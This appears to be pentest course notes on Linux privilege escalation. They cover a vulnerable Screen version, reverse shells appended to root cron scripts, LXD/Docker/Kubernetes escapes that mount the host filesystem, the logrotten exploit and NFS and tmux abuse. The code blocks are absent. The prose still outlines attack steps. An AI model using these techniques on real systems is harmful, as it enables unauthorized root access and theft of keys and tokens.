Service-based Privilege Escalation
Vulnerable Services
Many services may be found, which have flaws that can be leveraged to escalate privileges. An example is the popular terminal multiplexer Screen. Version 4.5.0 suffers from a privilege escalation vulnerability due to a lack of a permissions check when opening a log file.
This allows an attacker to truncate any file or create a file owned by root in any directory and ultimately gain full root access.
Privilege Escalation - Screen_Exploit.sh
Cron Job Abuse
Cron jobs can also be set to run one time (such as on boot). They are typically used for administrative tasks such as running backups, cleaning up directories, etc. The crontab
command can create a cron file, which will be run by the cron daemon on the schedule specified. When created, the cron file will be created in /var/spool/cron
for the specific user that creates it. Each entry in the crontab file requires six items in the following order: minutes, hours, days, months, weeks, commands. For example, the entry 0 */12 * * * /home/admin/backup.sh
would run every 12 hours.
The root crontab is almost always only editable by the root user or a user with full sudo privileges; however, it can still be abused. You may find a world-writable script that runs as root and, even if you cannot read the crontab to know the exact schedule, you may be able to ascertain how often it runs (i.e., a backup script that creates a .tar.gz
file every 12 hours). In this case, you can append a command onto the end of the script (such as a reverse shell one-liner), and it will execute the next time the cron job runs.
Certain applications create cron files in the /etc/cron.d
directory and may be misconfigured to allow a non-root user to edit them.
First, let's look around the system for any writeable files or directories. The file backup.sh
in the /dmz-backups
directory is interesting and seems like it could be running on a cron job.
(-o is an OR, the - before the permission string o+w is just find syntax)
A quick look in the /dmz-backups
directory shows what appears to be files created every three minutes. This seems to be a major misconfiguration. Perhaps the sysadmin meant to specify every three hours like 0 */3 * * *
but instead wrote */3 * * * *
, which tells the cron job to run every three minutes. The second issue is that the backup.sh
shell script is world writeable and runs as root.
We can confirm that a cron job is running using pspy, a command-line tool used to view running processes without the need for root privileges. We can use it to see commands run by other users, cron jobs, etc. It works by scanning procfs.
Let's run pspy
and have a look. The -pf
flag tells the tool to print commands and file system events and -i 1000
tells it to scan procfs every 1000ms (or every second).
From the above output, we can see that a cron job runs the backup.sh
script located in the /dmz-backups
directory and creating a tarball file of the contents of the /var/www/html
directory.
We can look at the shell script and append a command to it to attempt to obtain a reverse shell as root. If editing a script, make sure to ALWAYS
take a copy of the script and/or create a backup of it. We should also attempt to append our commands to the end of the script to still run properly before executing our reverse shell command.
We modify the script, stand up a local netcat
listener, and wait. Sure enough, within three minutes, we have a root shell!
Containers
Linux Containers
Linux Containers (LXC
) is an operating system-level virtualization technique that allows multiple Linux systems to run in isolation from each other on a single host by owning their own processes but sharing the host system kernel for them. LXC is very popular due to its ease of use and has become an essential part of IT security.
By default, LXC
consume fewer resources than a virtual machine and have a standard interface, making it easy to manage multiple containers simultaneously. A platform with LXC
can even be organized across multiple clouds, providing portability and ensuring that applications running correctly on the developer's system will work on any other system. In addition, large applications can be started, stopped, or their environment variables changed via the Linux container interface.
Linux Daemon
Linux Daemon (LXD) is similar in some respects but is designed to contain a complete operating system. Thus it is not an application container but a system container. Before we can use this service to escalate our privileges, we must be in either the lxc
or lxd
group. We can find this out with the following command:
From here on, there are now several ways in which we can exploit LXC
/LXD
. We can either create our own container and transfer it to the target system or use an existing container. Unfortunately, administrators often use templates that have little to no security. This attitude has the consequence that we already have tools that we can use against the system ourselves.
Such templates often do not have passwords, especially if they are uncomplicated test environments. These should be quickly accessible and uncomplicated to use. The focus on security would complicate the whole initiation, make it more difficult and thus slow it down considerably. If we are a little lucky and there is such a container on the system, it can be exploited. For this, we need to import this container as an image.
After verifying that this image has been successfully imported, we can initiate the image and configure it by specifying the security.privileged
flag and the root path for the container. This flag disables all isolation features that allow us to act on the host.
Once we have done that, we can start the container and log into it. In the container, we can then go to the path we specified to access the resource
of the host system as root
.
Docker
Docker is a popular open-source tool that provides a portable and consistent runtime environment for software applications. It uses containers as isolated environments in user space that run at the operating system level and share the file system and system resources.
Docker Architecture
At the core of the Docker architecture lies a client-server model, where we have two primary components:
The Docker daemon
The Docker client
The Docker client acts as our interface for issuing commands and interacting with the Docker ecosystem, while the Docker daemon is responsible for executing those commands and managing containers.
Docker Daemon
The Docker Daemon
, also known as the Docker server, is a critical part of the Docker platform that plays a pivotal role in container management and orchestration. Think of the Docker Daemon as the powerhouse behind Docker. It has several essential responsibilities like:
running Docker containers
interacting with Docker containers
managing Docker containers on the host system.
Managing Docker Containers
Firstly, it handles the core containerization functionality. It coordinates the creation, execution, and monitoring of Docker containers, maintaining their isolation from the host and other containers. This isolation ensures that containers operate independently, with their own file systems, processes, and network interfaces. Furthermore, it handles Docker image management. It pulls images from registries, such as Docker Hub or private repositories, and stores them locally. These images serve as the building blocks for creating containers.
Additionally, the Docker Daemon offers monitoring and logging capabilities, for example:
Captures container logs
Provides insight into container activities, errors, and debugging information.
The Daemon also monitors resource utilization, such as CPU, memory, and network usage, allowing us to optimize container performance and troubleshoot issues.
Network and Storage
It facilitates container networking by creating virtual networks and managing network interfaces. It enables containers to communicate with each other and the outside world through network ports, IP addresses, and DNS resolution. The Docker Daemon also plays a critical role in storage management, since it handles Docker volumes, which are used to persist data beyond the lifespan of containers and manages volume creation, attachment, and clean-up, allowing containers to share or store data independently of each other.
Docker Clients
When we interact with Docker, we issue commands through the Docker Client
, which communicates with the Docker Daemon (through a RESTful API
or a Unix socket
) and serves as our primary means of interacting with Docker. We also have the ability to create, start, stop, manage, remove containers, search, and download Docker images. With these options, we can pull existing images to use as a base for our containers or build our custom images using Dockerfiles. We have the flexibility to push our images to remote repositories, facilitating collaboration and sharing within our teams or with the wider community.
In comparison, the Daemon, on the other hand, carries out the requested actions, ensuring containers are created, launched, stopped, and removed as required.
Another client for Docker is Docker Compose
. It is a tool that simplifies the orchestration of multiple Docker containers as a single application. It allows us to define our application's multi-container architecture using a declarative YAML
(.yaml
/.yml
) file. With it, we can specify the services comprising our application, their dependencies, and their configurations. We define container images, environment variables, networking, volume bindings, and other settings. Docker Compose then ensures that all the defined containers are launched and interconnected, creating a cohesive and scalable application stack.
Docker Desktop
Docker Desktop
is available for MacOS, Windows, and Linux operating systems and provides us with a user-friendly GUI that simplifies the management of containers and their components. This allows us to monitor the status of our containers, inspect logs, and manage the resources allocated to Docker. It provides an intuitive and visual way to interact with the Docker ecosystem, making it accessible to developers of all levels of expertise, and additionally, it supports Kubernetes.
Docker Images and Containers
Think of a Docker image
as a blueprint or a template for creating containers. It encapsulates everything needed to run an application, including the application's code, dependencies, libraries, and configurations. An image is a self-contained, read-only package that ensures consistency and reproducibility across different environments. We can create images using a text file called a Dockerfile
, which defines the steps and instructions for building the image.
A Docker container
is an instance of a Docker image. It is a lightweight, isolated, and executable environment that runs applications. When we launch a container, it is created from a specific image, and the container inherits all the properties and configurations defined in that image. Each container operates independently, with its own filesystem, processes, and network interfaces. This isolation ensures that applications within containers remain separate from the underlying host system and other containers, preventing conflicts and interference.
While images
are immutable and read-only
, containers
are mutable and can be modified
during runtime. We can interact with containers, execute commands within them, monitor their logs, and even make changes to their filesystem or environment. However, any modifications made to a container's filesystem are not persisted unless explicitly saved as a new image or stored in a persistent volume.
Docker Privilege Escalation
What can happen is that we get access to an environment where we will find users who can manage docker containers. With this, we could look for ways how to use those docker containers to obtain higher privileges on the target system. We can use several ways and techniques to escalate our privileges or escape the docker container.
Docker Shared Directories
When using Docker, shared directories (volume mounts) can bridge the gap between the host system and the container's filesystem. With shared directories, specific directories or files on the host system can be made accessible within the container. This is incredibly useful for persisting data, sharing code, and facilitating collaboration between development environments and Docker containers. However, it always depends on the setup of the environment and the goals that administrators want to achieve. To create a shared directory, a path on the host system and a corresponding path within the container is specified, creating a direct link between the two locations.
When we get access to the docker container and enumerate it locally, we might find additional (non-standard) directories on the docker’s filesystem.
Docker Sockets
A Docker socket or Docker daemon socket is a special file that allows us and processes to communicate with the Docker daemon. This communication occurs either through a Unix socket or a network socket, depending on the configuration of our Docker setup. It acts as a bridge, facilitating communication between the Docker client and the Docker daemon. When we issue a command through the Docker CLI, the Docker client sends the command to the Docker socket, and the Docker daemon, in turn, processes the command and carries out the requested actions.
Nevertheless, Docker sockets require appropriate permissions to ensure secure communication and prevent unauthorized access. Access to the Docker socket is typically restricted to specific users or user groups, ensuring that only trusted individuals can issue commands and interact with the Docker daemon.
By exposing the Docker socket over a network interface, we can remotely manage Docker hosts, issue commands, and control containers and other resources. This remote API access expands the possibilities for distributed Docker setups and remote management scenarios. However, depending on the configuration, there are many ways where automated processes or tasks can be stored. Those files can contain very useful information for us that we can use to escape the Docker container.
From here on, we can use the docker
binary to interact with the socket and enumerate what docker containers are already running. If not installed, then we can download it here and upload it to the Docker container.
We can create our own Docker container that maps the host’s root directory (/
) to the /hostsystem
directory on the container. With this, we will get full access to the host system. Therefore, we must map these directories accordingly and use the main_app
Docker image.
Now, we can log in to the new privileged Docker container with the ID 7ae3bcc818af
and navigate to the /hostsystem
.
From there, we can again try to grab the private SSH key and log in as root or as any other user on the system with a private SSH key in its folder.
Docker Group
To gain root privileges through Docker, the user we are logged in with must be in the docker
group. This allows him to use and control the Docker daemon.
Alternatively, Docker may have SUID set, or we are in the Sudoers file, which permits us to run docker
as root. All three options allow us to work with Docker to escalate our privileges.
Most hosts have a direct internet connection because the base images and containers must be downloaded. However, many hosts may be disconnected from the internet at night and outside working hours for security reasons. However, if these hosts are located in a network where, for example, a web server has to pass through, it can still be reached.
To see which images exist and which we can access, we can use the following command:
Docker Socket
A case that can also occur is when the Docker socket is writable. Usually, this socket is located in /var/run/docker.sock
. However, the location can understandably be different. Because basically, this can only be written by the root or docker group. If we act as a user, not in one of these two groups, and the Docker socket still has the privileges to be writable, then we can still use this case to escalate our privileges.
Kubernetes
Kubernetes, also known as K8s
, stands out as a revolutionary technology that has had a significant impact on the software development landscape. This platform has completely transformed the process of deploying and managing applications, providing a more efficient and streamlined approach. Offering an open-source architecture, Kubernetes has been specifically designed to facilitate faster and more straightforward deployment, scaling, and management of application containers.
K8s Concept
Kubernetes revolves around the concept of pods, which can hold one or more closely connected containers. Each pod functions as a separate virtual machine on a node, complete with its own IP, hostname, and other details. Kubernetes simplifies the management of multiple containers by offering tools for load balancing, service discovery, storage orchestration, self-healing, and more. Despite challenges in security and management, K8s continues to grow and improve with features like Role-Based Access Control
(RBAC
), Network Policies
, and Security Contexts
, providing a safer environment for applications.
Differences between K8 and Docker
Function
Docker
Kubernetes
Primary
Platform for containerizing Apps
An orchestration tool for managing containers
Scaling
Manual scaling with Docker swarm
Automatic scaling
Networking
Single network
Complex network with policies
Storage
Volumes
Wide range of storage options
Kubernetes architecture is primarily divided into two types of components:
The Control Plane
(master node), which is responsible for controlling the Kubernetes clusterThe Worker Nodes
(minions), where the containerized applications are run
Nodes
The master node hosts the Kubernetes Control Plane
, which manages and coordinates all activities within the cluster and it also ensures that the cluster's desired state is maintained. On the other hand, the Minions
execute the actual applications and they receive instructions from the Control Plane and ensure the desired state is achieved.
It covers versatility in accommodating various needs, such as supporting databases, AI/ML workloads, and cloud-native microservices. Additionally, it's capable of managing high-resource applications at the edge and is compatible with different platforms. Therefore, it can be utilized on public cloud services like Google Cloud, Azure, and AWS or within private on-premises data centers.
Control Plane
The Control Plane serves as the management layer. It consists of several crucial components, including:
Service
TCP Ports
etcd
2379
, 2380
API server
6443
Scheduler
10251
Controller Manager
10252
Kubelet API
10250
Read-Only Kubelet API
10255
These elements enable the Control Plane
to make decisions and provide a comprehensive view of the entire cluster.
Minions
Within a containerized environment, the Minions
(worker nodes) serve as the designated location for running applications. It's important to note that each node is managed and regulated by the Control Plane, which helps ensure that all processes running within the containers operate smoothly and efficiently.
The Scheduler
, based on the API server
, understands the state of the cluster and schedules new pods on the nodes accordingly. After deciding which node a pod should run on, the API server updates the etcd
.
Understanding how these components interact is essential for grasping the functioning of Kubernetes. The API server is the entry point for all the administrative commands, either from users via kubectl or from the controllers. This server communicates with etcd to fetch or update the cluster state.
K8's Security Measures
Kubernetes security can be divided into several domains:
Cluster infrastructure security
Cluster configuration security
Application security
Data security
Each domain includes multiple layers and elements that must be secured and managed appropriately by the developers and administrators.
Kubernetes API
The core of Kubernetes architecture is its API, which serves as the main point of contact for all internal and external interactions. The Kubernetes API has been designed to support declarative control, allowing users to define their desired state for the system. This enables Kubernetes to take the necessary steps to implement the desired state. The kube-apiserver is responsible for hosting the API, which handles and verifies RESTful requests for modifying the system's state. These requests can involve creating, modifying, deleting, and retrieving information related to various resources within the system. Overall, the Kubernetes API plays a crucial role in facilitating seamless communication and control within the Kubernetes cluster.
Within the Kubernetes framework, an API resource serves as an endpoint that houses a specific collection of API objects. These objects pertain to a particular category and include essential elements such as Pods, Services, and Deployments, among others. Each unique resource comes equipped with a distinct set of operations that can be executed, including but not limited to:
Request
Description
GET
Retrieves information about a resource or a list of resources.
POST
Creates a new resource.
PUT
Updates an existing resource.
PATCH
Applies partial updates to a resource.
DELETE
Removes a resource.
Authentication
In terms of authentication, Kubernetes supports various methods such as client certificates, bearer tokens, an authenticating proxy, or HTTP basic auth, which serve to verify the user's identity. Once the user has been authenticated, Kubernetes enforces authorization decisions using Role-Based Access Control (RBAC
). This technique involves assigning specific roles to users or processes with corresponding permissions to access and operate on resources. Therefore, Kubernetes' authentication and authorization process is a comprehensive security measure that ensures only authorized users can access resources and perform operations.
In Kubernetes, the Kubelet
can be configured to permit anonymous access
. By default, the Kubelet allows anonymous access. Anonymous requests are considered unauthenticated, which implies that any request made to the Kubelet without a valid client certificate will be treated as anonymous. This can be problematic as any process or user that can reach the Kubelet API can make requests and receive responses, potentially exposing sensitive information or leading to unauthorized actions.
K8's API Server Interaction
System:anonymous
typically represents an unauthenticated user, meaning we haven't provided valid credentials or are trying to access the API server anonymously. In this case, we try to access the root path, which would grant significant control over the Kubernetes cluster if successful. By default, access to the root path is generally restricted to authenticated and authorized users with administrative privileges and the API server denied the request, responding with a 403 Forbidden
status code accordingly.
Kubelet API - Extracting Pods
The information displayed in the output includes the names
, namespaces
, creation timestamps
, and container images
of the pods. It also shows the last applied configuration
for each pod, which could contain confidential details regarding the container images and their pull policies.
Understanding the container images and their versions used in the cluster can enable us to identify known vulnerabilities and exploit them to gain unauthorized access to the system. Namespace information can provide insights into how the pods and resources are arranged within the cluster, which we can use to target specific namespaces with known vulnerabilities. We can also use metadata such as uid
and resourceVersion
to perform reconnaissance and recognize potential targets for further attacks. Disclosing the last applied configuration can potentially expose sensitive information, such as passwords, secrets, or API tokens, used during the deployment of the pods.
We can further analyze the pods with the following command:
Kubeletctl - Extracting Pods
To effectively interact with pods within the Kubernetes environment, it's important to have a clear understanding of the available commands. One approach that can be particularly useful is utilizing the scan rce
command in kubeletctl
. This command provides valuable insights and allows for efficient management of pods.
Kubelet API - Available Commands
It is also possible for us to engage with a container interactively and gain insight into the extent of our privileges within it. This allows us to better understand our level of access and control over the container's contents.
Kubelet API - Executing Commands
The output of the command shows that the current user executing the id
command inside the container has root privileges. This indicates that we have gained administrative access within the container, which could potentially lead to privilege escalation vulnerabilities. If we gain access to a container with root privileges, we can perform further actions on the host system or other containers.
Privilege Escalation
To gain higher privileges and access the host system, we can utilize a tool called kubeletctl to obtain the Kubernetes service account's token
and certificate
(ca.crt
) from the server. To do this, we must provide the server's IP address, namespace, and target pod. In case we get this token and certificate, we can elevate our privileges even more, move horizontally throughout the cluster, or gain access to additional pods and resources.
Kubelet API - Extracting Tokens
Kubelet API - Extracting Certificates
Now that we have both the token
and certificate
, we can check the access rights in the Kubernetes cluster. This is commonly used for auditing and verification to guarantee that users have the correct level of access and are not given more privileges than they need. However, we can use it for our purposes and we can inquire of K8s whether we have permission to perform different actions on various resources.
List Privileges
Here we can see a few very important information. Besides the selfsubject-resources we can get
, create
, and list
pods which are the resources representing the running container in the cluster. From here on, we can create a YAML
file that we can use to create a new container and mount the entire root filesystem from the host system into this container's /root
directory. From there on, we could access the host systems files and directories. The YAML
file could look like following:
Pod YAML
Once created, we can now create the new pod and check if it is running as expected.
Creating a new Pod
If the pod is running we can execute the command and we could spawn a reverse shell or retrieve sensitive data like private SSH key from the root user.
Extracting Root's SSH Key
Logrotate
Every Linux system produces large amounts of log files. To prevent the hard disk from overflowing, a tool called logrotate
takes care of archiving or disposing of old logs. If no attention is paid to log files, they become larger and larger and eventually occupy all available disk space. Furthermore, searching through many large log files is time-consuming. To prevent this and save disk space, logrotate
has been developed. The logs in /var/log
give administrators the information they need to determine the cause behind malfunctions. Almost more important are the unnoticed system details, such as whether all services are running correctly.
Logrotate
has many features for managing these log files. These include the specification of:
the
size
of the log file,its
age
,and the
action
to be taken when one of these factors is reached.
This tool is usually started periodically via cron
and controlled via the configuration file /etc/logrotate.conf
. Within this file, it contains global settings that determine the function of logrotate
.
To force a new rotation on the same day, we can set the date after the individual log files in the status file /var/lib/logrotate.status
or use the -f
/--force
option:
We can find the corresponding configuration files in /etc/logrotate.d/
directory.
To exploit logrotate
, we need some requirements that we have to fulfill.
we need
write
permissions on the log fileslogrotate must run as a privileged user or
root
vulnerable versions:
3.8.6
3.11.0
3.15.0
3.18.0
There is a prefabricated exploit that we can use for this if the requirements are met. This exploit is named logrotten. We can download and compile it on a similar kernel of the target system and then transfer it to the target system. Alternatively, if we can compile the code on the target system, then we can do it directly on the target system.
Next, we need a payload to be executed. Here many different options are available to us that we can use. In this example, we will run a simple bash-based reverse shell with the IP
and port
of our VM that we use to attack the target system.
However, before running the exploit, we need to determine which option logrotate
uses in logrotate.conf
.
In our case, it is the option: create
. Therefore we have to use the exploit adapted to this function.
After that, we have to start a listener on our VM / Attacker machine, which waits for the target system's connection.
As a final step, we run the exploit with the prepared payload and wait for a reverse shell as a privileged user or root.
Miscellaneous Techniques
Passive Traffic Capture
If tcpdump
is installed, unprivileged users may be able to capture network traffic, including, in some cases, credentials passed in cleartext. Several tools exist, such as net-creds and PCredz that can be used to examine data being passed on the wire. This may result in capturing sensitive information such as credit card numbers and SNMP community strings. It may also be possible to capture Net-NTLMv2, SMBv2, or Kerberos hashes, which could be subjected to an offline brute force attack to reveal the plaintext password. Cleartext protocols such as HTTP, FTP, POP, IMAP, telnet, or SMTP may contain credentials that could be reused to escalate privileges on the host.
Weak NFS Privileges
Network File System (NFS) allows users to access shared files or directories over the network hosted on Unix/Linux systems. NFS uses TCP/UDP port 2049. Any accessible mounts can be listed remotely by issuing the command showmount -e
, which lists the NFS server's export list (or the access control list for filesystems) that NFS clients.
When an NFS volume is created, various options can be set:
root_squash
If the root user is used to access NFS shares, it will be changed to the nfsnobody
user, which is an unprivileged account. Any files created and uploaded by the root user will be owned by the nfsnobody
user, which prevents an attacker from uploading binaries with the SUID bit set.
no_root_squash
Remote users connecting to the share as the local root user will be able to create files on the NFS server as the root user. This would allow for the creation of malicious scripts/programs with the SUID bit set.
For example, we can create a SETUID binary that executes /bin/sh
using our local root user. We can then mount the /tmp
directory locally, copy the root-owned binary over to the NFS server, and set the SUID bit.
First, create a simple binary, mount the directory locally, copy it, and set the necessary permissions.
Hijacking Tmux Sessions
Terminal multiplexers such as tmux can be used to allow multiple terminal sessions to be accessed within a single console session. When not working in a tmux
window, we can detach from the session, still leaving it active (i.e., running an nmap
scan). For many reasons, a user may leave a tmux
process running as a privileged user, such as root set up with weak permissions, and can be hijacked. This may be done with the following commands to create a new shared session and modify the ownership.
If we can compromise a user in the devs
group, we can attach to this session and gain root access.
Check for any running tmux
processes.
Confirm permissions.
Review our group membership.
Finally, attach to the tmux
session and confirm root privileges.
Last updated